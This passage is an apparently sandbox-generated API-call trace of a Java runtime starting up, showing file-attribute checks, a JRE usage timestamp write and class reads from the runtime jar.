cAlternateFileName="JRE18~1.0_1")) returned 0x425de0 [0101.188] FindClose (in: hFindFile=0x425de0 | out: hFindFile=0x425de0) returned 1 [0101.189] wcslen (_String="jre1.8.0_171") returned 0xc [0101.189] free (_Block=0x12293670) [0101.189] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0101.189] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0101.189] malloc (_Size=0x50) returned 0x12228ee0 [0101.189] wcscpy (in: _Dest=0x12228ee0, _Source="C:\\Program Files\\Java\\jre1.8.0_171" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171") returned="C:\\Program Files\\Java\\jre1.8.0_171" [0101.190] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", nBufferLength=0x9, lpBuffer=0x208e6c8, lpFilePart=0x208e6c0 | out: lpBuffer="", lpFilePart=0x208e6c0*=0x0) returned 0x23 [0101.190] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171" (normalized: "c:\\program files\\java\\jre1.8.0_171"), fInfoLevelId=0x0, lpFileInformation=0x208e460 | out: lpFileInformation=0x208e460*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0101.190] free (_Block=0x12228ee0) [0101.190] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0101.190] malloc (_Size=0x50) returned 0x12228d60 [0101.190] wcscpy (in: _Dest=0x12228d60, _Source="C:\\Program Files\\Java\\jre1.8.0_171" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171") returned="C:\\Program Files\\Java\\jre1.8.0_171" [0101.191] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", nBufferLength=0x9, lpBuffer=0x208e6c8, lpFilePart=0x208e6c0 | out: lpBuffer="", lpFilePart=0x208e6c0*=0x0) returned 0x23 [0101.191] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171" (normalized: "c:\\program files\\java\\jre1.8.0_171"), fInfoLevelId=0x0, lpFileInformation=0x208e460 | out: lpFileInformation=0x208e460*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0101.191] free (_Block=0x12228d60) [0101.203] malloc (_Size=0xc) returned 0x122934f0 [0101.203] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0xf [0101.203] malloc (_Size=0xf) returned 0x122933d0 [0101.203] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x122933d0, nSize=0xf | out: lpBuffer="") returned 0xe [0101.204] strlen (_Str="C:\\ProgramData") returned 0xe [0101.204] free (_Block=0x122933d0) [0101.204] free (_Block=0x122934f0) [0101.207] wcslen (_String="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp") returned 0x47 [0101.207] malloc (_Size=0x9a) returned 0x12292090 [0101.207] wcscpy (in: _Dest=0x12292090, _Source="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp" | out: _Dest="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp") returned="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp" [0101.207] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp", nBufferLength=0x9, lpBuffer=0x208e7a8, lpFilePart=0x208e7a0 | out: lpBuffer="", lpFilePart=0x208e7a0*=0x0) returned 0x48 [0101.207] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp"), fInfoLevelId=0x0, lpFileInformation=0x208e540 | out: lpFileInformation=0x208e540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dbfdaee, ftCreationTime.dwHighDateTime=0x1d70a94, ftLastAccessTime.dwLowDateTime=0x8dbfdaee, ftLastAccessTime.dwHighDateTime=0x1d70a94, ftLastWriteTime.dwLowDateTime=0x833dea1a, ftLastWriteTime.dwHighDateTime=0x1d70a97, nFileSizeHigh=0x0, nFileSizeLow=0x33)) returned 1 [0101.208] free (_Block=0x12292090) [0101.210] wcslen (_String="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp") returned 0x47 [0101.210] malloc (_Size=0x9a) returned 0x12292090 [0101.210] wcscpy (in: _Dest=0x12292090, _Source="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp" | out: _Dest="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp") returned="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp" [0101.210] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\17dfc292991c7ca0.timestamp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a8 [0101.211] free (_Block=0x12292090) [0101.213] strlen (_Str="java/lang/StringCoding.class") returned 0x1c [0101.213] malloc (_Size=0x48) returned 0x1228eaf0 [0101.213] malloc (_Size=0xa0) returned 0x12291ff0 [0101.213] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418f30, lpNewFilePointer=0x208d510, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d510*=54628144) returned 1 [0101.213] ReadFile (in: hFile=0x134, lpBuffer=0x12291ff0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d4e0, lpOverlapped=0x0 | out: lpBuffer=0x12291ff0*, lpNumberOfBytesRead=0x208d4e0*=0xa0, lpOverlapped=0x0) returned 1 [0101.214] malloc (_Size=0x1d) returned 0x12221ba0 [0101.214] strlen (_Str="java/lang/StringCoding.class") returned 0x1c [0101.214] strcpy (in: _Dest=0x208d690, _Source="java/lang/StringCoding.class" | out: _Dest="java/lang/StringCoding.class") returned="java/lang/StringCoding.class" [0101.214] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x311700a, lpNewFilePointer=0x208d110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d110*=51474442) returned 1 [0101.214] ReadFile (in: hFile=0x134, lpBuffer=0x208d160, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d0e0, lpOverlapped=0x0 | out: lpBuffer=0x208d160*, lpNumberOfBytesRead=0x208d0e0*=0x1e, lpOverlapped=0x0) returned 1 [0101.216] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3117044, lpNewFilePointer=0x208d170, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d170*=51474500) returned 1 [0101.216] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x1842, lpNumberOfBytesRead=0x208d140, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d140*=0x1842, lpOverlapped=0x0) returned 1 [0101.216] free (_Block=0x12220ae0) [0101.216] free (_Block=0x1228e5a0) [0101.231] strlen (_Str="java/lang/ThreadLocal$ThreadLocalMap.class") returned 0x2a [0101.231] malloc (_Size=0x48) returned 0x1228e3c0 [0101.231] malloc (_Size=0xa0) returned 0x12291ff0 [0101.231] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418ed8, lpNewFilePointer=0x208d5a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d5a0*=54628056) returned 1 [0101.231] ReadFile (in: hFile=0x134, lpBuffer=0x12291ff0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d570, lpOverlapped=0x0 | out: lpBuffer=0x12291ff0*, lpNumberOfBytesRead=0x208d570*=0xa0, lpOverlapped=0x0) returned 1 [0101.232] malloc (_Size=0x2b) returned 0x122211a0 [0101.232] strlen (_Str="java/lang/ThreadLocal$ThreadLocalMap.class") returned 0x2a [0101.232] strcpy (in: _Dest=0x208d720, _Source="java/lang/ThreadLocal$ThreadLocalMap.class" | out: _Dest="java/lang/ThreadLocal$ThreadLocalMap.class") returned="java/lang/ThreadLocal$ThreadLocalMap.class" [0101.232] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3115eda, lpNewFilePointer=0x208d1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1a0*=51470042) returned 1 [0101.233] ReadFile (in: hFile=0x134, lpBuffer=0x208d1f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d170, lpOverlapped=0x0 | out: lpBuffer=0x208d1f0*, lpNumberOfBytesRead=0x208d170*=0x1e, lpOverlapped=0x0) returned 1 [0101.235] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3115f22, lpNewFilePointer=0x208d200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d200*=51470114) returned 1 [0101.235] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x10e8, lpNumberOfBytesRead=0x208d1d0, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d1d0*=0x10e8, lpOverlapped=0x0) returned 1 [0101.236] free (_Block=0x12221ba0) [0101.237] free (_Block=0x1228eaf0) [0101.244] strlen (_Str="java/lang/ThreadLocal$ThreadLocalMap$Entry.class") returned 0x30 [0101.244] malloc (_Size=0x48) returned 0x1228e7d0 [0101.244] malloc (_Size=0xa0) returned 0x12291ff0 [0101.244] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418e7a, lpNewFilePointer=0x208d520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d520*=54627962) returned 1 [0101.244] ReadFile (in: hFile=0x134, lpBuffer=0x12291ff0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d4f0, lpOverlapped=0x0 | out: lpBuffer=0x12291ff0*, lpNumberOfBytesRead=0x208d4f0*=0xa0, lpOverlapped=0x0) returned 1 [0101.245] malloc (_Size=0x31) returned 0x12221260 [0101.245] strlen (_Str="java/lang/ThreadLocal$ThreadLocalMap$Entry.class") returned 0x30 [0101.245] strcpy (in: _Dest=0x208d6a0, _Source="java/lang/ThreadLocal$ThreadLocalMap$Entry.class" | out: _Dest="java/lang/ThreadLocal$ThreadLocalMap$Entry.class") returned="java/lang/ThreadLocal$ThreadLocalMap$Entry.class" [0101.245] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3115c5f, lpNewFilePointer=0x208d120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d120*=51469407) returned 1 [0101.246] ReadFile (in: hFile=0x134, lpBuffer=0x208d170, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d0f0, lpOverlapped=0x0 | out: lpBuffer=0x208d170*, lpNumberOfBytesRead=0x208d0f0*=0x1e, lpOverlapped=0x0) returned 1 [0101.246] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3115cad, lpNewFilePointer=0x208d180, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d180*=51469485) returned 1 [0101.246] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9c0, nNumberOfBytesToRead=0x22d, lpNumberOfBytesRead=0x208d150, lpOverlapped=0x0 | out: lpBuffer=0x20fe9c0*, lpNumberOfBytesRead=0x208d150*=0x22d, lpOverlapped=0x0) returned 1 [0101.247] free (_Block=0x122211a0) [0101.247] free (_Block=0x1228e3c0) [0101.252] strlen (_Str="sun/nio/cs/UTF_8") returned 0x10 [0101.252] malloc (_Size=0x48) returned 0x1228e8c0 [0101.253] malloc (_Size=0xa0) returned 0x12291ff0 [0101.253] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418e36, lpNewFilePointer=0x208d9f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9f0*=54627894) returned 1 [0101.253] ReadFile (in: hFile=0x134, lpBuffer=0x12291ff0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d9c0, lpOverlapped=0x0 | out: lpBuffer=0x12291ff0*, lpNumberOfBytesRead=0x208d9c0*=0xa0, lpOverlapped=0x0) returned 1 [0101.253] malloc (_Size=0x17) returned 0x122932b0 [0101.254] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x311583e, lpNewFilePointer=0x208d5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d5f0*=51468350) returned 1 [0101.254] ReadFile (in: hFile=0x134, lpBuffer=0x208d640, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d5c0, lpOverlapped=0x0 | out: lpBuffer=0x208d640*, lpNumberOfBytesRead=0x208d5c0*=0x1e, lpOverlapped=0x0) returned 1 [0101.254] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3115872, lpNewFilePointer=0x208d650, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d650*=51468402) returned 1 [0101.254] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x3ed, lpNumberOfBytesRead=0x208d620, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d620*=0x3ed, lpOverlapped=0x0) returned 1 [0101.255] malloc (_Size=0x48) returned 0x1228eb40 [0101.255] malloc (_Size=0xa0) returned 0x12291ff0 [0101.255] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418df0, lpNewFilePointer=0x208cfb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cfb0*=54627824) returned 1 [0101.255] ReadFile (in: hFile=0x134, lpBuffer=0x12291ff0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cf80, lpOverlapped=0x0 | out: lpBuffer=0x12291ff0*, lpNumberOfBytesRead=0x208cf80*=0xa0, lpOverlapped=0x0) returned 1 [0101.256] malloc (_Size=0x19) returned 0x12221f00 [0101.256] strlen (_Str="sun/nio/cs/Unicode.class") returned 0x18 [0101.256] strcpy (in: _Dest=0x208d130, _Source="sun/nio/cs/Unicode.class" | out: _Dest="sun/nio/cs/Unicode.class") returned="sun/nio/cs/Unicode.class" [0101.256] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x311506f, lpNewFilePointer=0x208cbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cbb0*=51466351) returned 1 [0101.256] ReadFile (in: hFile=0x134, lpBuffer=0x208cc00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cb80, lpOverlapped=0x0 | out: lpBuffer=0x208cc00*, lpNumberOfBytesRead=0x208cb80*=0x1e, lpOverlapped=0x0) returned 1 [0101.257] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31150a5, lpNewFilePointer=0x208cc10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc10*=51466405) returned 1 [0101.257] ReadFile (in: hFile=0x134, lpBuffer=0x122766b0, nNumberOfBytesToRead=0x799, lpNumberOfBytesRead=0x208cbe0, lpOverlapped=0x0 | out: lpBuffer=0x122766b0*, lpNumberOfBytesRead=0x208cbe0*=0x799, lpOverlapped=0x0) returned 1 [0101.257] free (_Block=0x122932b0) [0101.257] free (_Block=0x1228e8c0) [0101.266] strlen (_Str="java/lang/StringCoding$StringEncoder.class") returned 0x2a [0101.266] malloc (_Size=0x48) returned 0x1228ebe0 [0101.266] malloc (_Size=0xa0) returned 0x12291ff0 [0101.266] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418d98, lpNewFilePointer=0x208d760, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d760*=54627736) returned 1 [0101.266] ReadFile (in: hFile=0x134, lpBuffer=0x12291ff0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d730, lpOverlapped=0x0 | out: lpBuffer=0x12291ff0*, lpNumberOfBytesRead=0x208d730*=0xa0, lpOverlapped=0x0) returned 1 [0101.267] malloc (_Size=0x2b) returned 0x12220ca0 [0101.267] strlen (_Str="java/lang/StringCoding$StringEncoder.class") returned 0x2a [0101.268] strcpy (in: _Dest=0x208d8e0, _Source="java/lang/StringCoding$StringEncoder.class" | out: _Dest="java/lang/StringCoding$StringEncoder.class") returned="java/lang/StringCoding$StringEncoder.class" [0101.268] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3114683, lpNewFilePointer=0x208d360, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d360*=51463811) returned 1 [0101.268] ReadFile (in: hFile=0x134, lpBuffer=0x208d3b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d330, lpOverlapped=0x0 | out: lpBuffer=0x208d3b0*, lpNumberOfBytesRead=0x208d330*=0x1e, lpOverlapped=0x0) returned 1 [0101.269] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31146cb, lpNewFilePointer=0x208d3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3c0*=51463883) returned 1 [0101.270] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0x9a4, lpNumberOfBytesRead=0x208d390, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d390*=0x9a4, lpOverlapped=0x0) returned 1 [0101.270] free (_Block=0x12221f00) [0101.270] free (_Block=0x1228eb40) [0101.276] strlen (_Str="sun/nio/cs/UTF_8$Encoder.class") returned 0x1e [0101.276] malloc (_Size=0x48) returned 0x1228e960 [0101.276] malloc (_Size=0xa0) returned 0x12291ff0 [0101.276] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418d4c, lpNewFilePointer=0x208d620, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d620*=54627660) returned 1 [0101.276] ReadFile (in: hFile=0x134, lpBuffer=0x12291ff0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d5f0, lpOverlapped=0x0 | out: lpBuffer=0x12291ff0*, lpNumberOfBytesRead=0x208d5f0*=0xa0, lpOverlapped=0x0) returned 1 [0101.277] malloc (_Size=0x1f) returned 0x12222020 [0101.277] strlen (_Str="sun/nio/cs/UTF_8$Encoder.class") returned 0x1e [0101.277] strcpy (in: _Dest=0x208d7a0, _Source="sun/nio/cs/UTF_8$Encoder.class" | out: _Dest="sun/nio/cs/UTF_8$Encoder.class") returned="sun/nio/cs/UTF_8$Encoder.class" [0101.277] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31137f8, lpNewFilePointer=0x208d220, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d220*=51460088) returned 1 [0101.278] ReadFile (in: hFile=0x134, lpBuffer=0x208d270, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d1f0, lpOverlapped=0x0 | out: lpBuffer=0x208d270*, lpNumberOfBytesRead=0x208d1f0*=0x1e, lpOverlapped=0x0) returned 1 [0101.284] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3113834, lpNewFilePointer=0x208d280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d280*=51460148) returned 1 [0101.284] ReadFile (in: hFile=0x134, lpBuffer=0x12276130, nNumberOfBytesToRead=0xe4f, lpNumberOfBytesRead=0x208d250, lpOverlapped=0x0 | out: lpBuffer=0x12276130*, lpNumberOfBytesRead=0x208d250*=0xe4f, lpOverlapped=0x0) returned 1 [0101.285] free (_Block=0x12220ca0) [0101.285] free (_Block=0x1228ebe0) [0101.327] WriteFile (in: hFile=0x2a8, lpBuffer=0x208c740*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x208c710, lpOverlapped=0x0 | out: lpBuffer=0x208c740*, lpNumberOfBytesWritten=0x208c710*=0x33, lpOverlapped=0x0) returned 1 [0101.331] strlen (_Str="java/io/FileOutputStream$1.class") returned 0x20 [0101.331] malloc (_Size=0x48) returned 0x1228e7d0 [0101.331] malloc (_Size=0xa0) returned 0x12291ff0 [0101.331] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418cfe, lpNewFilePointer=0x208d7d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7d0*=54627582) returned 1 [0101.331] ReadFile (in: hFile=0x134, lpBuffer=0x12291ff0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d7a0, lpOverlapped=0x0 | out: lpBuffer=0x12291ff0*, lpNumberOfBytesRead=0x208d7a0*=0xa0, lpOverlapped=0x0) returned 1 [0101.332] malloc (_Size=0x21) returned 0x12221e10 [0101.332] strlen (_Str="java/io/FileOutputStream$1.class") returned 0x20 [0101.332] strcpy (in: _Dest=0x208d950, _Source="java/io/FileOutputStream$1.class" | out: _Dest="java/io/FileOutputStream$1.class") returned="java/io/FileOutputStream$1.class" [0101.332] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31135e8, lpNewFilePointer=0x208d3d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3d0*=51459560) returned 1 [0101.333] ReadFile (in: hFile=0x134, lpBuffer=0x208d420, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d3a0, lpOverlapped=0x0 | out: lpBuffer=0x208d420*, lpNumberOfBytesRead=0x208d3a0*=0x1e, lpOverlapped=0x0) returned 1 [0101.334] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3113626, lpNewFilePointer=0x208d430, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d430*=51459622) returned 1 [0101.334] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x1d2, lpNumberOfBytesRead=0x208d400, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208d400*=0x1d2, lpOverlapped=0x0) returned 1 [0101.334] free (_Block=0x12222020) [0101.334] free (_Block=0x1228e960) [0101.341] CloseHandle (hObject=0x2a8) returned 1 [0101.346] strlen (_Str="sun/launcher/LauncherHelper.class") returned 0x21 [0101.346] malloc (_Size=0x48) returned 0x1228ee10 [0101.346] malloc (_Size=0xa0) returned 0x122920e0 [0101.346] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418caf, lpNewFilePointer=0x208f4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f4a0*=54627503) returned 1 [0101.346] ReadFile (in: hFile=0x134, lpBuffer=0x122920e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f470, lpOverlapped=0x0 | out: lpBuffer=0x122920e0*, lpNumberOfBytesRead=0x208f470*=0xa0, lpOverlapped=0x0) returned 1 [0101.348] malloc (_Size=0x22) returned 0x12221ae0 [0101.348] strlen (_Str="sun/launcher/LauncherHelper.class") returned 0x21 [0101.348] strcpy (in: _Dest=0x208f620, _Source="sun/launcher/LauncherHelper.class" | out: _Dest="sun/launcher/LauncherHelper.class") returned="sun/launcher/LauncherHelper.class" [0101.348] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31101be, lpNewFilePointer=0x208f0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f0a0*=51446206) returned 1 [0101.348] ReadFile (in: hFile=0x134, lpBuffer=0x208f0f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208f070, lpOverlapped=0x0 | out: lpBuffer=0x208f0f0*, lpNumberOfBytesRead=0x208f070*=0x1e, lpOverlapped=0x0) returned 1 [0101.351] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31101fd, lpNewFilePointer=0x208f100, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f100*=51446269) returned 1 [0101.351] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x33eb, lpNumberOfBytesRead=0x208f0d0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208f0d0*=0x33eb, lpOverlapped=0x0) returned 1 [0101.355] free (_Block=0x12221e10) [0101.356] free (_Block=0x1228e7d0) [0101.362] malloc (_Size=0x48) returned 0x1228eb40 [0101.362] malloc (_Size=0xa0) returned 0x12296a00 [0101.362] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418c57, lpNewFilePointer=0x208e5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5e0*=54627415) returned 1 [0101.362] ReadFile (in: hFile=0x134, lpBuffer=0x12296a00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e5b0, lpOverlapped=0x0 | out: lpBuffer=0x12296a00*, lpNumberOfBytesRead=0x208e5b0*=0xa0, lpOverlapped=0x0) returned 1 [0101.363] malloc (_Size=0x2b) returned 0x122219a0 [0101.363] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310f7d2, lpNewFilePointer=0x208e1e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1e0*=51443666) returned 1 [0101.363] ReadFile (in: hFile=0x134, lpBuffer=0x208e230, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e1b0, lpOverlapped=0x0 | out: lpBuffer=0x208e230*, lpNumberOfBytesRead=0x208e1b0*=0x1e, lpOverlapped=0x0) returned 1 [0101.371] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310f81a, lpNewFilePointer=0x208e240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e240*=51443738) returned 1 [0101.371] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x9a4, lpNumberOfBytesRead=0x208e210, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e210*=0x9a4, lpOverlapped=0x0) returned 1 [0101.374] malloc (_Size=0x48) returned 0x1228e780 [0101.374] malloc (_Size=0xa0) returned 0x12296550 [0101.374] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34188b8, lpNewFilePointer=0x208e6d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e6d0*=54626488) returned 1 [0101.374] ReadFile (in: hFile=0x134, lpBuffer=0x12296550, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e6a0, lpOverlapped=0x0 | out: lpBuffer=0x12296550*, lpNumberOfBytesRead=0x208e6a0*=0xa0, lpOverlapped=0x0) returned 1 [0101.375] malloc (_Size=0x1c) returned 0x12221e10 [0101.375] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3105016, lpNewFilePointer=0x208e2d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2d0*=51400726) returned 1 [0101.375] ReadFile (in: hFile=0x134, lpBuffer=0x208e320, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e2a0, lpOverlapped=0x0 | out: lpBuffer=0x208e320*, lpNumberOfBytesRead=0x208e2a0*=0x1e, lpOverlapped=0x0) returned 1 [0101.377] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310504f, lpNewFilePointer=0x208e330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e330*=51400783) returned 1 [0101.377] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x270a, lpNumberOfBytesRead=0x208e300, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e300*=0x270a, lpOverlapped=0x0) returned 1 [0101.379] malloc (_Size=0x48) returned 0x1228f040 [0101.379] malloc (_Size=0xa0) returned 0x12296550 [0101.379] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418a8b, lpNewFilePointer=0x208dc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc90*=54626955) returned 1 [0101.379] ReadFile (in: hFile=0x134, lpBuffer=0x12296550, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc60, lpOverlapped=0x0 | out: lpBuffer=0x12296550*, lpNumberOfBytesRead=0x208dc60*=0xa0, lpOverlapped=0x0) returned 1 [0101.380] malloc (_Size=0x1c) returned 0x12221ba0 [0101.380] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3108dee, lpNewFilePointer=0x208d890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d890*=51416558) returned 1 [0101.380] ReadFile (in: hFile=0x134, lpBuffer=0x208d8e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d860, lpOverlapped=0x0 | out: lpBuffer=0x208d8e0*, lpNumberOfBytesRead=0x208d860*=0x1e, lpOverlapped=0x0) returned 1 [0101.382] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3108e27, lpNewFilePointer=0x208d8f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8f0*=51416615) returned 1 [0101.382] ReadFile (in: hFile=0x134, lpBuffer=0x1225e210, nNumberOfBytesToRead=0x2674, 